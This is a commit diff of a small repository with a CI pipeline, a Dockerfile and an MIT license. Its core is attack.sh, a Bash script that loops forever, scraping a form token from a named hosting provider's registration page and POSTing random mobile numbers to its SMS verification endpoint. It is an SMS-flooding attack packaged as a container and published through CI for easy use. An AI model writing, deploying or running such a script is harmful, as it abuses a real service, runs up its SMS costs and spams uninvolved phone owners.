first

.gitlab-ci.yml

+stages:
+  - build
+  - combine
+  - deploy
+
+variables:
+  GIT_DEPTH: "1"
+  CONTAINER_TEST_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG
+  CONTAINER_TEST_ARM_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG-arm
+  CONTAINER_TEST_X86_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG-x86
+  CONTAINER_RELEASE_IMAGE: $CI_REGISTRY_IMAGE:latest
+
+before_script:
+  - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
+
+build-x86:
+  stage: build
+  tags: 
+    - docker
+  script:
+    - docker build --pull -t $CONTAINER_TEST_X86_IMAGE .
+    - docker push $CONTAINER_TEST_X86_IMAGE
+
+build-arm:
+  stage: build
+  tags: 
+    - docker-arm
+  script:
+    - docker build --pull -t $CONTAINER_TEST_ARM_IMAGE .
+    - docker push $CONTAINER_TEST_ARM_IMAGE
+
+combine:
+  stage: combine
+  tags:
+    - docker
+  script:
+    - docker pull $CONTAINER_TEST_X86_IMAGE
+    - docker pull $CONTAINER_TEST_ARM_IMAGE
+    - docker manifest create $CONTAINER_TEST_IMAGE --amend $CONTAINER_TEST_X86_IMAGE --amend $CONTAINER_TEST_ARM_IMAGE
+    - docker manifest push $CONTAINER_TEST_IMAGE
+
+deploy_latest:
+  stage: deploy
+  tags: 
+    - docker
+  script:
+    - docker pull $CONTAINER_TEST_IMAGE
+    - docker tag $CONTAINER_TEST_IMAGE $CONTAINER_RELEASE_IMAGE
+    - docker push $CONTAINER_RELEASE_IMAGE
+  only:
+    - master
+
+deploy_tag:
+  stage: deploy
+  tags: 
+    - docker
+  variables:
+    CONTAINER_TAG_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_TAG
+  script:
+    - docker pull $CONTAINER_TEST_IMAGE
+    - docker tag $CONTAINER_TEST_IMAGE $CONTAINER_TAG_IMAGE
+    - docker push $CONTAINER_TAG_IMAGE
+  only:
+    - tags

Dockerfile

+FROM debian:bullseye-slim
+LABEL Author="Nanahira <nanahira@momobako.com>"
+
+RUN apt update && apt -y install curl jq && rm -rf /var/lib/apt/lists/* /tmp/* /var/
+WORKDIR /usr/src/app
+COPY ./attack.sh ./
+
+CMD ["./attack.sh"]

LICENSE

+MIT License
+
+Copyright (c) 2021 nanahira
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

attack.sh

+#!/bin/bash
+_attack() {
+	mobile=13$((RANDOM % 9000 + 1000))$((RANDOM % 90000 + 10000))
+	token=$(curl -sL 'https://www.coalcloud.net/register.php' | grep -oP '<input type="hidden" name="token" value="[a-z0-9]+" />' | sed 's/<input type="hidden" name="token" value="//g;s/" \/>//g')
+	curl -sL -X POST 'https://www.coalcloud.net/modules/addons/SMS_Verification/action.php?action=send'  -d "phone=$mobile" -d "token=$token" | jq
+}
+
+for ((;;)); do 
+	_attack
+done